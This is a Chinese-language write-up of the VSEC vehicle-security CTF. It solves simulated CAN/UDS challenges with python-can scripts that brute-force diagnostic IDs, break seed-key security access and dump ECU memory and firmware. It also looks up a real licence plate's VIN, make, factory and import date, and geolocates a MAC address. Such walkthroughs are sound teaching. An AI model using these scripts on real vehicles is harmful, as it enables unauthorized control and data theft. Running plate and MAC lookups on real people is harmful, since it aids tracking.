VSEC 车联网安全 CTF 挑战
前排提示,文中有一部分 candump 放在后台执行是因为我当时想不到发送的时候同时监视 candump 的方法,只能先写到日志里然后发完指令后查看日志文件
后来发现竟然有 python-can 这个库,一定程度上解决了这个问题,但是就发个包还要改脚本也挺麻烦的,后来发现这个终端是 tmux,所以可以自己分割窗口
比如执行:tmux split-window 会分为上下两个窗格,tmux split-window -h 会分为左右两个窗格,后续可以通过快捷键切换窗格,例如分割为左右两个窗格后可以先按下 ctrl+b 再按方向键的 ← → 来切换
先在这里:https://vsec.blockharbor.io/ 注册账号登陆后点击 Capture the Flag
跳转到这个界面选择:Proving Grounds
会跳转到一个 CTFd 平台,就可以答题啦
Getting Started
Can you find the interface?
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E UDS Challenge Simulation, then launch the terminal.
What is the name of the CAN interface available on the virtual terminal?
翻译:此挑战在 VSEC 上的 Harborbay 车辆模拟器中进行。从主页进入 HarborBay。选择 Mach-E UDS 挑战模拟,然后启动终端。
虚拟终端上可用的 CAN 接口名称是什么?
回到 VSEC 平台,选择 Garage
选择 UDS Challenge (simulation)
再点击 Open Terminal 会打开一个终端
这就来到了操作的终端,感觉目前大多数在 linux 平台操作 CAN 总线都是先将 CAN 总线接口映射到 socketCAN,比如 pcan 可以用:ip link set can0 up type can bitrate 500000
想要看 CAN 接口名称可以在终端输入 ifconfig 或者 ip link,得到 flag:vcan0
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E UDS Challenge Simulation, then launch the terminal.
What is the Arbitration ID of the CAN frame being sent periodically on the CAN interface?
翻译:本次挑战在 VSEC 上的 Harborbay 车辆模拟器中进行。从主页进入 HarborBay。选择 Mach-E UDS 挑战模拟,然后启动终端。
在 CAN 接口上定期发送的 CAN 帧的仲裁 ID 是什么?
想要看 CAN 总线上发的什么可以使用 candump 指定特定的 CAN 接口,监听 CAN 总线上的数据,可以看到定期发送的 CAN 数据,ID 为 59E,因此 flag 为 59E
Data Field 1
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E UDS Challenge Simulation, then launch the terminal.
How many bytes of data are in the data field of the CAN frame being sent periodically on the CAN interface?
翻译:此挑战在 VSEC 上的 Harborbay 车辆模拟器中进行。从主页进入 HarborBay。选择 Mach-E UDS 挑战模拟,然后启动终端。
在 CAN 接口上定期发送的 CAN 帧的数据字段中有多少字节数据?
问你定期发送 CAN 帧的 DLC(Data Length Code)是多少,也就是 数据的长度,同样使用 candump vcan0 可以得到答案为 2
Data Field 2
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E UDS Challenge Simulation, then launch the terminal.
What is the value of the data field of the CAN frame being sent periodically on the CAN interface? Format: XXYY
翻译:此挑战在 VSEC 上的 Harborbay 车辆模拟器中进行。从主页进入 HarborBay。选择 Mach-E UDS 挑战模拟,然后启动终端。
在 CAN 接口上定期发送的 CAN 帧的数据字段的值是多少?格式:XXYY
数据就是 9E10
Message Frequency
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E UDS Challenge Simulation, then launch the terminal.
What is the frequency that the periodic CAN frame is transmit at? (in Hz)
翻译:此挑战在 VSEC 上的 Harborbay 车辆模拟器中进行。从主页进入 HarborBay。选择 Mach-E UDS 挑战模拟,然后启动终端。
周期性 CAN 帧的传输频率是多少?(单位为 Hz)
使用 candump -l vcan0 可以将 CAN 总线数据捕获为一个 log 文件,查看该 log 文件会有每条 CAN 数据记录的时间,题目问周期性 CAN 帧的传输频率,感觉不可能算的多精确,看上去基本就是一秒一个,所以试了一下答案就是 1...
what is a great default password?
Minus 1 million points if this is your actual password.
如果这是您的实际密码,则扣除 100 万分。
嗯.. 一开始以为三个问号表示的是三个字符,试了试 123 啥的不行,随手试了试 admin、password,结果是 password
Founding Fathers
题目描述:When was Block Harbor founded?
翻译:Block Harbor 是什么时候建立的?
搜一下 Block Harbor 在官网找到介绍,可以看到是 2014 年建立的
Vehicle OSINT
Finding a VIN
题目描述:Here's a license plate "DCR 660", it is registered in Michigan. Can you find the VIN?
翻译:这是车牌“DCR 660”,注册地为密歇根州。你能找到 VIN 吗?
以 "DCR 660"、"Michigan"、"VIN" 为关键词在 google 搜索,发现有个叫车牌查询的网站
查询得到 VIN 码:YV4A22PK1H1184823
Make and model
题目描述:Here's a license plate "DCR 660", it is registered in Michigan. What is the make and model?
Format: year-make-model
翻译:这是牌照“DCR 660”,在密歇根州注册。品牌和型号是什么?
嗯.. 在刚才的网站已经有了:2017-VOLVO-XC90
Manufactured at?
题目描述:Here's a license plate "DCR 660", it is registered in Michigan. Where was it manufactured at?
Format: City, Country
翻译:这是车牌“DCR 660”,在密歇根州注册。它是在哪里制造的?
上一个网站信息有限,且要收费... 这个网站信息比较全:https://www.lookupaplate.com/michigan/DCR660/
可以看到城市和国家分别是:TORSLANDA 和 SWEDEN,因此 flag 为:TORSLANDA, SWEDEN(注意逗号后面的空格...)
Imported when?
题目描述:Here's a license plate "DCR 660", it is registered in Michigan. When was this car imported to the US?
Format: dd-mm-yyyy
翻译:这是车牌“DCR 660”,在密歇根州注册。这辆车什么时候进口到美国的?
实在找不到好用的网站查询,基本都要花钱,然后直接搜了搜 VIN 码,找到了这么个网页:https://www.zauba.com/USA-import-v/shipment-date-2017-05-01T00%3A00%3A00Z/country-SE-data.html,展开详情后搜索 VIN 码定位到具体的日期:2017 年 5 月 11 号,flag 为:11-05-2017
Mac Track!
题目描述:We've managed to identify the MAC address of a vehicle of interest, can you help us track down where it was located on December 8'th, 2022? We need the latitude and longitude to two decimal places.
MAC: 2A:38:5C:91:E5:27
Hint: format XX.XX,XX.XX
翻译:我们已成功识别出相关车辆的 MAC 地址,您能帮我们追踪它在 2022 年 12 月 8 日的位置吗?我们需要精确到小数点后两位的纬度和经度。
提示:格式 XX.XX,XX.XX
这题需要用到 https://wigle.net 这个网站,注册账号后点击 View 下面的 Advanced Search 将题目给出的 MAC 地址输进去查询
找到 2022 年 12 月的经纬度信息42.34 和 -83.00,然后需要四舍五入... 所以 flag 为:42.35,-83.01
Unlock my door
题目描述:Please download https://github.com/zombieCraig/ICSim and read the instructions to compile/run. Once setup, set the seed value -s 10000 for both the ./controls and ./icsim. Next Answer the following questions. Use any tool you would like in order to arrive at the answers.
What is the arbitration id for door unlocks?
NOTE: Submit in the format 0xARBID
翻译:请下载 https://github.com/zombieCraig/ICSim 并阅读编译/运行说明。设置完成后,为 ./controls 和 ./icsim 设置种子值 -s 10000。下一步回答以下问题。使用任何您想要的工具来获得答案。
门解锁的仲裁 ID 是什么?
注意:以 0xARBID 格式提交
这道题的出题方式还挺不错的,这个 ICSim 本来就支持自定义种子,种子相同的情况下仲裁 ID 是一样的,因此环境让选手自己搭建,主办方指定一个种子就好了
直接参考项目 README 搭建起来后指定种子运行
/icsim vcan0 -s 10000
./controls vcan0 -s 10000
然后开启一个窗口使用 candump -l vcan0 记录一下 CAN 信号,然后操作几次车门(在 controls 界面按键盘右边的 shift + A )结束后让 kimi 写个小脚本,统计一下不同的 CAN ID 出现的次数,例如:
# 导入所需的库
from collections import defaultdict
import re
import sys
def count_can_ids(log_file_path):
# 创建一个字典来存储CAN ID及其出现次数
can_id_count = defaultdict(int)
# 尝试打开并读取candump日志文件
with open(log_file_path, 'r') as file:
for line in file:
# 使用正则表达式提取CAN ID
match = re.search(r'\(\d+\.\d+\)\s+vcan0\s+(\w+)#', line)
if match:
# 将匹配到的CAN ID添加到字典中,并增加其计数
can_id = match.group(1)
can_id_count[can_id] += 1
except FileNotFoundError:
print(f"Error: The file '{log_file_path}' does not exist.")
except Exception as e:
print(f"An error occurred: {e}")
# 打印统计结果
for can_id, count in sorted(can_id_count.items()):
print(f"CAN ID {can_id} appears {count} times.")
# 从命令行参数获取日志文件路径
if len(sys.argv) != 2:
print("Usage: python script.py <path_to_candump_log_file>")
log_file_path = sys.argv[1]
我只操作了 5 此车门,那么这里出现 5 次的就是车门解锁的仲裁 ID:5C6 了,提交:0x5C6
Speedometer ArbId
题目描述:Please download https://github.com/zombieCraig/ICSim and read the instructions to compile/run. Once setup, set the seed value -s 10000 for both the ./controls and ./icsim. Next Answer the following questions. Use any tool you would like in order to arrive at the answers.
What is the abritration id for the speedometor display?
翻译:请下载 https://github.com/zombieCraig/ICSim 并阅读编译/运行说明。设置完成后,为 ./controls 和 ./icsim 设置种子值 -s 10000。下一步回答以下问题。使用任何您想要的工具来获得答案。
速度计显示屏的 ID 是什么?
这道题应该是想问仪表盘上显示车速的 CAN ID 是什么,可以使用 cansniffer -c vcan0 高亮显示出变化的 CAN 报文,看了一会,发现当加速到最高速时 0x779 不变了,松开加速键它的值在减少,因此 0x779 就是 flag
VSEC HarborBay
Simulation VIN
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E UDS Challenge Simulation, then launch the terminal.
Retrieve the VIN of the simulation using UDS.
翻译:此挑战在 VSEC 上的 Harborbay 车辆模拟器中进行。从主页进入 HarborBay。选择 Mach-E UDS 挑战模拟,然后启动终端。
使用 UDS 检索模拟的 VIN。
首先使用 candump -l vcan0 &
把接收到的 CAN 消息保存到日志中,方便查看
使用 cansend vcan0 7df#0322f190
发送一个诊断读取 VIN 码的消息,可以看到是 7E8 回复了一部分 VIN 码
cansend vcan0 7df#0322f190
cansend vcan0 7E0#3000000000000000
提取 VIN 码后转为 ASCII 得到 flag:flag{v1n_BHmach3}
至于为什么 ID 是 7E0,可以参考这张表,既然 ECU 回复的 ID 是 7E8,那你去请求自然要是 7E0 了
Startup Message
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E UDS Challenge Simulation, then launch the terminal.
It seems the simulation broadcasts some diagnostic information on arbitration ID 0x7DF when booting up, what does this message say? (in ASCII)
HINT: How can you get an ECU to restart?
翻译:此挑战在 VSEC 上的 Harborbay 车辆模拟器中进行。从主页进入 HarborBay。选择 Mach-E UDS 挑战模拟,然后启动终端。
似乎模拟在启动时广播了一些有关仲裁 ID 0x7DF 的诊断信息,这条消息说了什么?(ASCII 格式)
提示:如何让 ECU 重新启动?
076730477265336E 转为 ASCII:g0Gre3n
Engine Trouble?
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E UDS Challenge Simulation, then launch the terminal.
The simulation's engine light is on, can you read the diagnostic code?
Check out our youtube walkthrough if you get stuck: https://www.youtube.com/watch?v=IaUL0dA4Z_Y
The format of the DTC is Pxxxx-xx. Example answer: P1234-01
翻译:此挑战在 VSEC 上的 Harborbay 车辆模拟器内进行。从主页进入 HarborBay。选择 Mach-E UDS 挑战模拟,然后启动终端。
如果你遇到困难,请查看我们的 YouTube 演示:https://www.youtube.com/watch?v=IaUL0dA4Z_Y
DTC 的格式为 Pxxxx-xx。示例答案:P1234-01
使用 UDS 的 19 服务查看 DTC,其常用子服务如下:
子功能ID | 子功能描述 |
0x00 | ISO SAE Reserved |
0x01 | Report Number Of DTC By Status Mask |
0x02 | Report DTC By Status Mask |
0x03 | Report DTC Snapshot Identification |
0x04 | Report DTC Snapshot Record By DTC Number |
0x05 | Report DTC Stored Data By Record Number |
0x06 | Report DTC External Data Record By DTC Number |
0x07 | Report Number Of DTC By Severity Mask Record |
0x08 | Report DTC By Severity Mask Record |
0x09 | Report Severity Information Of DTC |
0x0A | Report All Supported DTC |
0x0B | Report First Test Failed DTC |
0x0C | Report First Confirmed DTC |
0x0D | Report Most Recent Test Failed DTC |
0x0E | Report Most Recent Confirmed DTC |
0x0F | Report Mirror Memory DTC By Status Mask |
0x10 | Report Mirror Memory DTC Extended Data Record By DTC Number |
0x11 | Report Number Of Mirror Memory DTC By Status Mask |
0x12 | Report Number Of Emissions OBD DTC By Status Mask |
0x13 | Report Emissions OBD DTC By Status Mask |
0x14 | Report DTC Fault Detection Counter |
0x15 | Report DTC With Permanent Status |
0x16 | Report DTC Extended Data Record By Record Number |
0x17 | Report User Defined Memory DTC By Status Mask |
0x18 | Report User Defined Memory DTC Snapshot Record By DTC Number |
0x19 | Report User Defined Memory DTC Extended Data Record By DTC Number |
0x1A – 0x41 | ISO SAE Reserved |
0x42 | Report WWH OBD DTC By Mask Record |
0x43 – 0x54 | ISO SAE Reserved |
0x55 | Report WWH OBD DTC With Permanent Status |
0x56 – 0x7F | ISO SAE Reserved |
这次来使用状态掩码读取 DTC,也就是 02 子服务,但掩码是啥呢,定义如下,我们来读 confirmedDTC,也就是 bit3 为 1,其余为 0,0000 1000 => 08
Bit | Meaning |
0 | testFailed |
1 | testFailedThisMonitoringCycle |
2 | pendingDTC |
3 | confirmedDTC |
4 | testNotCompletedSinceLastClear |
5 | testFailedSinceLastClear |
6 | testNotCompletedThisMonitoringCycle |
7 | warningIndicatorRequested |
cansend vcan0 7DF#03190208
对收到的数据 3E9F01AB 进行解析,前两位有一个对应关系
00 | P 动力总成 |
01 | C 底盘 |
10 | B 车身 |
11 | U 网络 |
根据这个表进行解析,但根据提示,应该后面还跟着东西,所以把后面的 01 也带上得到:P3E9F-01
Secrets in Memory?
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E UDS Challenge Simulation, then launch the terminal.
It seems the simulation allows access to only some off-chip sections of memory, are there any secrets in the visible memory?
The memory region starts at 0xC3F80000 and the flag is in the format flag{...}.
翻译:这项挑战在 VSEC 上的 Harborbay 车辆模拟器中进行。从主页进入 HarborBay。选择 Mach-E UDS 挑战模拟,然后启动终端。
内存区域从 0xC3F80000 开始,标志的格式为 flag{...}。
读 0xC3F80000 这块的内存,那就是用 UDS 的 23 服务了
cansend vcan0 7DF#072314C3F80000FF
其中 07 表示诊断报文的长度,23 表示子功能,14 表示要读取的 size 是用 1 个字节表示的,地址是用 4 个字节表示的,后面紧跟地址 C3F80000 和 size:FF
cansend vcan0 7E0#3000000000000000 再发个流控帧
然后又试了试后面很多地址全是空的,最终忍不了了,写个脚本吧,才发现机器上带着 python-can 的库...
import can
import time
import binascii
bus = can.Bus(interface='socketcan', channel='vcan0')
bus.set_filters([{"can_id": 0x7E8, "can_mask": 0xFFF, "extended": False}])
recvdata = "[DATA]:"
for hex_value in range(0xC3F83000, 0xc3f87000, 0xFF):
byte1 = (hex_value >> 24) & 0xFF
byte2 = (hex_value >> 16) & 0xFF
byte3 = (hex_value >> 8) & 0xFF
byte4 = hex_value & 0xFF
candata=[0x07, 0x23, 0x14, byte1, byte2, byte3, byte4, 0xFF]
message = can.Message(arbitration_id=0x7DF, is_extended_id=False, dlc=8, data=[0x02, 0x10, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00])
bus.send(message, timeout=0.2)
msg = bus.recv()
message = can.Message(arbitration_id=0x7DF, is_extended_id=False, dlc=8, data=candata)
bus.send(message, timeout=0.2)
msg = bus.recv()
recvdata += binascii.hexlify(msg.data).decode('utf-8')[6:]
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])
bus.send(message, timeout=0.2)
temp = 0
while temp < 36:
msg = bus.recv()
tempdata = binascii.hexlify(msg.data).decode('utf-8')[2:]
if tempdata != "00000000000000":
recvdata += tempdata
temp = temp + 1
print("\n========== READMEM ==========")
print("========== READMEM ==========\n")
这距离给的地址也太远了吧... 幸亏没手敲
得到 flag:flag{mem+r34d}
Security Access Level 3
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E UDS Challenge Simulation, then launch the terminal.
The simulation is implementing service 0x27 Security Access Level 3 using MAAATH. Can you find the key and break in?
The flag is the key to unlock with seed 1337 in hex (example a5a5)
Unlock Hint for 0 points
flag is the two bytes of key you send (example: 55aa)
翻译:此挑战在 VSEC 上的 Harborbay 车辆模拟器内进行。从主页进入 HarborBay。选择 Mach-E UDS 挑战模拟,然后启动终端。
模拟正在使用 MAAATH 实现服务 0x27 安全访问级别 3。你能找到钥匙并闯入吗?
标志是使用十六进制种子 1337 解锁的钥匙(例如 a5a5)
解锁提示 0 分
这道题提示了个:MAAATH,应该是 MATH,数学的意思,然后就他妈的没有然后了...
俺想问问看这篇文章的师傅们,让你想,你能想到什么???我写了个脚本爆破了一下,跑了几次就返回 NRC 36 了(尝试获取安全访问次数的次数超过了服务器的安全策略允许的次数)
倒是每次先给 ECU reset 一下是可以的,虽然只有两个字节,但是我感觉不抱希望,而且题目要求你解出来特定 seed 的 key 但爆破成功次数比较少的话怕是也不好找规律吧... 例如题目说种子是 0x1337 时的 key,我不觉得我能恰好爆破到一个 0x1337 的 seed 的 key...
然后在 github 发现了有人写了 wp,说是 seed 取反(一开始机翻是补码,后来看代码应该是直接取反)
0x1337 = 0001001100110111
最终得到 ecc8 也就是 flag
这好歹提示个位操作也行哇... 给自己做个表情包笑死哈哈哈
写了个脚本跑了几次,确实是对的(6704 表示通过了安全访问)
Security Access Level 1
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E UDS Challenge Simulation, then launch the terminal.
Level 3 provides access to a new diagnostic session and some new memory at 0x1A000, but we still don't have full control of the module. Can you provide a valid key for security access level 1?
The flag is the key to unlock with seed 7D0E1A5C in hex (example 12345678)
翻译:此挑战在 VSEC 上的 Harborbay 车辆模拟器内进行。从主页进入 HarborBay。选择 Mach-E UDS 挑战模拟,然后启动终端。
级别 3 提供对新诊断会话和 0x1A000 处的一些新内存的访问,但我们仍然无法完全控制该模块。您能为安全访问级别 1 提供有效的密钥吗?
该标志是使用十六进制种子 7D0E1A5C(例如 12345678)解锁的密钥
题目说,通过了安全访问级别 3 后可以读取 0x1A000 处的新的内存访问,那就通过安全访问 level3 后读取这块内存看看到底存了些啥
写个脚本加长长度读一下看看,读取范围设置到 0x1A000 到 0x1AFFF,可以看到,在后面会记录请求的种子,跟在种子后面还有一串值,长度和种子一样的
9102870c c43b2d1b
d64217a8 837bbdbf
241adbeb 712371fc
9bb26411 ce8bce06
找规律,发现两个异或结果始终为:0x5539aa17,因此猜测该算法是使用种子异或 0x5539aa17
根据猜想的算法尝试通过安全访问 level1 成功
因此,此题 flag 为 7D0E1A5C 异或 0x5539aa17 即:2837b04b
VSEC Garage: User Space Diagnostics
User Space Diagnostics 的系列题目需要用到另一个终端
Read Data By Identifier
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E User Space Diagnostics Challenge Simulation, then launch the terminal.
Can you identify the data?
翻译:这项挑战在 VSEC 上的 Harborbay 车辆模拟器中进行。从主页进入 HarborBay。选择 Mach-E 用户空间诊断挑战模拟,然后启动终端。
打开里面 candump 也没东西,有点不知所措了🤦,发了个 7DF 的也没人(ECU)回复,试着给 7E0 发了个请求倒是回复了个 NRC,表示这个 ID 不支持,再根据题目意思,看样子是想让我爆破一下?搓个脚本试试
import can
import time
import binascii
bus = can.Bus(interface='socketcan', channel='vcan0')
for i in range(0,0xFF):
for j in range(0,0xFF):
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x03, 0x22, i, j, 0x00, 0x00, 0x00, 0x00])
bus.send(message, timeout=0.2)
msg = bus.recv()
当发到 0008 的时候就正常读取到了信息,算出题人有良心,记一颗红豆
cansend vcan0 7E0#03220008
cansend vcan0 7E0#3000000000000000
Routine Control
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E User Space Diagnostics Challenge Simulation, then launch the terminal.
I hear routine control has a lot of fun features.
翻译:这项挑战在 VSEC 上的 Harborbay 车辆模拟器中进行。从主页进入 HarborBay。选择 Mach-E 用户空间诊断挑战模拟,然后启动终端。
使用 Routine Control 服务来执行已定义的步骤序列并获取任何相关结果,服务 ID 是 0x31
import can
import time
import binascii
bus = can.Bus(interface='socketcan', channel='vcan0')
bus.set_filters([{"can_id": 0x7E8, "can_mask": 0xFFF, "extended": False}])
for i in range(0,0xFF):
for j in range(0,0xFF):
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x04, 0x31, 0x01, i, j, 0x00, 0x00, 0x00])
bus.send(message, timeout=0.2)
msg = bus.recv()
result = binascii.hexlify(msg.data).decode('utf-8')
if result == "037f3131":
print("i: ",hex(i)," j: ",hex(j))
跑了一段时间发现 1337 是响应的,因此先执行 1337 然后再获取结果,得到:bh{c0ntroll1ng_th3_r0ut1nes}
Security Access Level 1
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E User Space Diagnostics Challenge Simulation, then launch the terminal.
I hear single byte XOR keys are a great security measure, can you prove me wrong?
翻译:此挑战在 VSEC 上的 Harborbay 车辆模拟器中进行。从主页进入 HarborBay。选择 Mach-E 用户空间诊断挑战模拟,然后启动终端。
我听说单字节 XOR 密钥是一种很好的安全措施,你能证明我错了吗?
安全访问 level1 单字节的异或密钥,那直接上脚本爆破吧
import can
import time
import binascii
bus = can.Bus(interface='socketcan', channel='vcan0')
bus.set_filters([{"can_id": 0x7E8, "can_mask": 0xFFF, "extended": False}])
for key in range(0,0xFF):
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x02, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00])
bus.send(message, timeout=0.2)
msg = bus.recv()
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x02, 0x27, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00])
bus.send(message, timeout=0.2)
msg = bus.recv()
result = binascii.hexlify(msg.data).decode('utf-8')
seed = result[6:14]
key1 = int(seed[:2],16) ^ key
key2 = int(seed[2:4],16) ^ key
key3 = int(seed[4:6],16) ^ key
key4 = int(seed[6:8],16) ^ key
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x06, 0x27, 0x02, key1, key2, key3, key4, 0x00])
bus.send(message, timeout=0.2)
msg = bus.recv()
result = binascii.hexlify(msg.data).decode('utf-8')
if result == "037f2735":
print("key: ",hex(key))
直到爆破到 0x20 的时候才成功,再发个流控得到 flag
import can
import time
import binascii
bus = can.Bus(interface='socketcan', channel='vcan0')
bus.set_filters([{"can_id": 0x7E8, "can_mask": 0xFFF, "extended": False}])
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x02, 0x27, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00])
bus.send(message, timeout=0.2)
msg = bus.recv()
result = binascii.hexlify(msg.data).decode('utf-8')
seed = result[6:14]
key1 = int(seed[:2],16) ^ 0x20
key2 = int(seed[2:4],16) ^ 0x20
key3 = int(seed[4:6],16) ^ 0x20
key4 = int(seed[6:8],16) ^ 0x20
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x06, 0x27, 0x02, key1, key2, key3, key4, 0x00])
bus.send(message, timeout=0.2)
msg = bus.recv()
result = binascii.hexlify(msg.data).decode('utf-8')
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])
bus.send(message, timeout=0.2)
msg = bus.recv(timeout=0.2)
result = binascii.hexlify(msg.data).decode('utf-8')
msg = bus.recv(timeout=0.2)
result = binascii.hexlify(msg.data).decode('utf-8')
msg = bus.recv(timeout=0.2)
result = binascii.hexlify(msg.data).decode('utf-8')
msg = bus.recv(timeout=0.2)
result = binascii.hexlify(msg.data).decode('utf-8')
msg = bus.recv(timeout=0.2)
result = binascii.hexlify(msg.data).decode('utf-8')
Read Memory By Address
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E User Space Diagnostics Challenge Simulation, then launch the terminal.
I wonder whats at 0xc0ffe000?
翻译:此挑战在 VSEC 上的 Harborbay 车辆模拟器内进行。从主页进入 HarborBay。选择 Mach-E 用户空间诊断挑战模拟,然后启动终端。
我想知道 0xc0ffe000 是什么?
就是读内存呗,上脚本,先过了安全启动 level1 再读取内存,这里读取内存的终点设置为 0xC0FFEEF1 是试出来的,读到 0xC0FFEFF0 的时候会出现 NRC 31,权限不够,因此少读一点就出结果了
import can
import time
import binascii
bus = can.Bus(interface='socketcan', channel='vcan0')
bus.set_filters([{"can_id": 0x7E8, "can_mask": 0xFFF, "extended": False}])
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x02, 0x27, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00])
bus.send(message, timeout=0.2)
msg = bus.recv()
result = binascii.hexlify(msg.data).decode('utf-8')
seed = result[6:14]
key1 = int(seed[:2],16) ^ 0x20
key2 = int(seed[2:4],16) ^ 0x20
key3 = int(seed[4:6],16) ^ 0x20
key4 = int(seed[6:8],16) ^ 0x20
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x06, 0x27, 0x02, key1, key2, key3, key4, 0x00])
bus.send(message, timeout=0.2)
msg = bus.recv()
result = binascii.hexlify(msg.data).decode('utf-8')
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])
bus.send(message, timeout=0.2)
for i in range(5):
msg = bus.recv(timeout=0.2) # 接受剩余的27返回值
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x02, 0x10, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00])
bus.send(message, timeout=0.2)
msg = bus.recv() #进入编程会话
def readmem():
recvdata = ""
for hex_value in range(0xc0ffe000, 0xC0FFEEF1, 0xFF):
byte1 = (hex_value >> 24) & 0xFF
byte2 = (hex_value >> 16) & 0xFF
byte3 = (hex_value >> 8) & 0xFF
byte4 = hex_value & 0xFF
candata=[0x07, 0x23, 0x14, byte1, byte2, byte3, byte4, 0xFF]
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=candata)
bus.send(message, timeout=0.2)
msg = bus.recv()
recvdata += binascii.hexlify(msg.data).decode('utf-8')[6:]
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])
bus.send(message, timeout=0.2)
temp = 0
while temp < 36:
msg = bus.recv()
tempdata = binascii.hexlify(msg.data).decode('utf-8')[2:]
if tempdata != "00000000000000":
recvdata += tempdata
temp = temp + 1
print("\n========== READMEM ==========")
print("========== READMEM ==========\n")
转为 ascii 码:bh{far_0ut_m4n!}
Security Access Level 3
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E User Space Diagnostics Challenge Simulation, then launch the terminal.
Bit twiddling is pretty common on a lot of vehicles, hope you can implement it!
You will need to dump the firmware of the appliation to do this, and further challenges. As a hint, think of where linux applications get mapped without ASLR?
翻译:此挑战在 VSEC 上的 Harborbay 车辆模拟器内进行。从主页进入 HarborBay。选择 Mach-E 用户空间诊断挑战模拟,然后启动终端。
你需要转储应用程序的固件才能执行此操作,并进行进一步的挑战。作为提示,想想在没有 ASLR 的情况下 Linux 应用程序被映射到哪里?
啊哈!这次提示 位操作 了!另外还需要转储固件进行分析,提示说:如果没有 ASLR,Linux 应用程序将映射到的地址是 0x400000
首先尝试读取一下 0x400000 这块的地址,怀疑也要先通过安全启动 level1 才能读取,读取完之后直接把内容写到文件里,有些地址读取的时候会出现 31 的 NRC 需要注意一下
import can
import time
import binascii
bus = can.Bus(interface='socketcan', channel='vcan0')
bus.set_filters([{"can_id": 0x7E8, "can_mask": 0xFFF, "extended": False}])
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x02, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00])
bus.send(message, timeout=0.2)
msg = bus.recv()
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x02, 0x27, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00])
bus.send(message, timeout=0.2)
msg = bus.recv()
result = binascii.hexlify(msg.data).decode('utf-8')
seed = result[6:14]
key1 = int(seed[:2],16) ^ 0x20
key2 = int(seed[2:4],16) ^ 0x20
key3 = int(seed[4:6],16) ^ 0x20
key4 = int(seed[6:8],16) ^ 0x20
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x06, 0x27, 0x02, key1, key2, key3, key4, 0x00])
bus.send(message, timeout=0.2)
msg = bus.recv()
result = binascii.hexlify(msg.data).decode('utf-8')
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])
bus.send(message, timeout=0.2)
for i in range(5):
msg = bus.recv(timeout=0.2) # 接受剩余的27返回值
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x02, 0x10, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00])
bus.send(message, timeout=0.2)
msg = bus.recv() #进入编程会话
def readmem_tofile():
file = open("my.bin","wb")
for hex_value in range(0x400000, 0x600000, 0xFF):
byte1 = (hex_value >> 24) & 0xFF
byte2 = (hex_value >> 16) & 0xFF
byte3 = (hex_value >> 8) & 0xFF
byte4 = hex_value & 0xFF
candata=[0x07, 0x23, 0x14, byte1, byte2, byte3, byte4, 0xFF]
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=candata)
bus.send(message, timeout=0.2)
msg = bus.recv()
data = binascii.hexlify(msg.data).decode('utf-8')[2:]
if data == "7f2331":
